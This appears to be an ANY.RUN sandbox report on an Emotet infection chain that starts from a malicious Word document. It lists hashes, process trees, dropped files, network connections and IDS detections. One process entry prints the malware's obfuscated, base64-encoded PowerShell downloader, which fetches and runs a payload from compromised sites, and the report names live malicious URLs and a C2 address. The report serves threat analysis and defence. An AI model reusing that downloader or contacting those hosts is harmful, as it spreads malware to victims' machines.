analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://twincitiesfrugalmom.com/wp-admin/eTrac/9porgmi/ul99a0-5568735694-75056-vt6wk395a-yymz6f

Full analysis: https://app.any.run/tasks/ef59180f-d91d-4509-b917-a43f6d6a6c8b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 15:30:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
trojan
Indicators:
MD5:

F22DDCF93F87267913C6C32E3143AAA0

SHA1:

F142EAEED4A846F22D21FF902CDCD42913974B66

SHA256:

233F1C21BA5445FE837A93FE1F6D3879BBD5D646F877B031C53DB51AAF632A10

SSDEEP:

3:N8aMLGQgDRsgGXNKXLMj8tJWLuj6ER0xI7D:2aMypDRsgrXBPWu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • iexplore.exe (PID: 3600)
      • WINWORD.EXE (PID: 820)
    • Application was dropped or rewritten from another process

      • 535.exe (PID: 3060)
      • 535.exe (PID: 2056)
      • serialfunc.exe (PID: 1296)
      • serialfunc.exe (PID: 3620)
    • Emotet process was detected

      • 535.exe (PID: 3060)
    • EMOTET was detected

      • serialfunc.exe (PID: 3620)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 3620)
    • Connects to CnC server

      • serialfunc.exe (PID: 3620)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2524)
      • WINWORD.EXE (PID: 820)
    • Application launched itself

      • WINWORD.EXE (PID: 820)
    • Executed via WMI

      • powershell.exe (PID: 504)
    • Creates files in the user directory

      • powershell.exe (PID: 504)
    • PowerShell script executed

      • powershell.exe (PID: 504)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 504)
      • 535.exe (PID: 3060)
    • Starts itself from another location

      • 535.exe (PID: 3060)
    • Connects to server without host name

      • serialfunc.exe (PID: 3620)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2524)
    • Creates files in the user directory

      • iexplore.exe (PID: 3600)
      • WINWORD.EXE (PID: 820)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3600)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3600)
    • Changes internet zones settings

      • iexplore.exe (PID: 2524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 820)
      • WINWORD.EXE (PID: 3820)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 504)
      • 535.exe (PID: 3060)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
9
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe 535.exe no specs #EMOTET 535.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2524"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3600"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2524 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
820"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\I2F7H3KV\1853967791[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3820"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
504powershell -w hidden -en JABLAHYAcQBsAHMAdAB0AGQAZwA9ACcAVgBqAHUAZAB1AHgAbgBsAHEAYQBjAHoAZAAnADsAJABTAGIAawB5AGcAdQBlAHkAYQB5ACAAPQAgACcANQAzADUAJwA7ACQAUwBrAG4AbQBnAHYAdgBvAHkAPQAnAE4AeABuAGsAYwBlAGIAbwAnADsAJABEAGEAeQB1AGsAbwBnAHIAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBiAGsAeQBnAHUAZQB5AGEAeQArACcALgBlAHgAZQAnADsAJABRAGsAYgBuAG0AcgBlAGgAdwBuAD0AJwBOAGEAcwB0AGMAdABhAG4AZgBlAHoAJwA7ACQARgBqAGkAeQB0AGoAbAB1AGIAZQByAHcAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBFAEIAYwBsAEkARQBuAFQAOwAkAEsAdABmAGcAcwB0AGIAZQB6AGsAcwB5AGYAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgByAGoAbwAuAGMAbwBtAC8ANgBwAHEAYQBtAHkANAAvADIAYQBnAC8AKgBoAHQAdABwADoALwAvAGEAaQByAC0AbwAtAHQAcgBpAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAE4ARwAyAC8AKgBoAHQAdABwADoALwAvAGkAbgBmAC4AYQB3AHcAdABoAGkAbgBnAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG8ANgBsAC8AKgBoAHQAdABwAHMAOgAvAC8AawBhAHIAeQBhAGsAcgBlAGEAcwBpAG4AZABvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AOQB6AHQALwAqAGgAdAB0AHAAcwA6AC8ALwBnAGUAbQBzAHQAYQB0AGUAZABlAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG4AYwAvACcALgAiAHMAUABgAGwASQBUACIAKAAnACoAJwApADsAJABPAGQAcAB6AHUAYwB6AG4AdABiAHoAbQB6AD0AJwBSAGcAYwBoAGUAdwBqAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB3AG4AbQByAGUAeQBhAGwAbQBwAG0AIABpAG4AIAAkAEsAdABmAGcAcwB0AGIAZQB6AGsAcwB5AGYAKQB7AHQAcgB5AHsAJABGAGoAaQB5AHQAagBsAHUAYgBlAHIAdwAuACIARABPAGAAVwBuAEwATwBgAEEARABgAEYAaQBMAGUAIgAoACQAQwB3AG4AbQByAGUAeQBhAGwAbQBwAG0ALAAgACQARABhAHkAdQBrAG8AZwByAGcAKQA7ACQASQBvAGEAZwBsAGsAZgBuAD0AJwBPAGgAYgBsAHkAZQB1AHoAcwBnAGQAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAGEAeQB1AGsAbwBnAHIAZwApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMwA5ADkANgA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAEQAYQB5AHUAawBvAGcAcgBnACkAOwAkAFkAYwBzAHEAZABlAHEAeQBwAHMAdABsAG0APQAnAFAAZwBsAHUAcQBkAHoAYQB3AGYAcwAnADsAYgByAGUAYQBrADsAJABaAGMAeQBpAHMAZQBoAGoAcgBwAGsAPQAnAFEAcgBpAHIAbgByAGgAagBkAGEAcgBmAGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgB3AGwAawBwAGQAeQBtAHQAbABzAGgAZgA9ACcAUgBiAGEAdABtAGgAcwBlAHIAYQBoAGQAdgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2056"C:\Users\admin\535.exe" C:\Users\admin\535.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3060--6e6396f5C:\Users\admin\535.exe
535.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1296"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe535.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3620--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Total events
3 436
Read events
2 482
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
7
Text files
11
Unknown types
12

Dropped files

PID
Process
Filename
Type
2524iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2524iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2524iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF14B608E9038A76C5.TMP
MD5:
SHA256:
820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD75F.tmp.cvr
MD5:
SHA256:
820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6F00A32E-EEFF-4360-BB25-75D578217309.0\FCE00B7E.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6F00A32E-EEFF-4360-BB25-75D578217309.0\9005945B.wmf
MD5:
SHA256:
3820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6F00A32E-EEFF-4360-BB25-75D578217309.0\647CAA0.wmf
MD5:
SHA256:
3820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6F00A32E-EEFF-4360-BB25-75D578217309.0\B6010A21.wmf
MD5:
SHA256:
3820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6F00A32E-EEFF-4360-BB25-75D578217309.0\A54FA9AE.wmf
MD5:
SHA256:
3820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6F00A32E-EEFF-4360-BB25-75D578217309.0\B4A4F1D7.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
10
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
504
powershell.exe
GET
200
104.28.30.186:80
http://air-o-trip.com/wp-admin/NG2/
US
html
3.97 Kb
shared
504
powershell.exe
GET
200
104.28.0.203:80
http://inf.awwthings.com/wp-admin/o6l/
US
html
3.97 Kb
shared
3620
serialfunc.exe
POST
200
107.2.2.28:80
http://107.2.2.28/qRmCOW
US
binary
132 b
malicious
504
powershell.exe
GET
301
209.97.150.99:80
http://www.rjo.com/6pqamy4/2ag/
US
html
162 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2524
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
504
powershell.exe
104.28.30.186:80
air-o-trip.com
Cloudflare Inc
US
shared
504
powershell.exe
209.97.150.99:80
www.rjo.com
US
unknown
504
powershell.exe
209.97.150.99:443
www.rjo.com
US
unknown
3600
iexplore.exe
50.87.232.94:443
twincitiesfrugalmom.com
Unified Layer
US
unknown
3620
serialfunc.exe
107.2.2.28:80
Comcast Cable Communications, LLC
US
malicious
504
powershell.exe
104.28.0.203:80
inf.awwthings.com
Cloudflare Inc
US
shared
504
powershell.exe
101.50.1.17:443
karyakreasindo.com
PT. Beon Intermedia
ID
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
twincitiesfrugalmom.com
  • 50.87.232.94
unknown
www.rjo.com
  • 209.97.150.99
unknown
air-o-trip.com
  • 104.28.30.186
  • 104.28.31.186
unknown
inf.awwthings.com
  • 104.28.0.203
  • 104.28.1.203
unknown
karyakreasindo.com
  • 101.50.1.17
malicious

Threats

PID
Process
Class
Message
3620
serialfunc.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
3620
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
3620
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
3620
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1 ETPRO signatures available at the full report
No debug info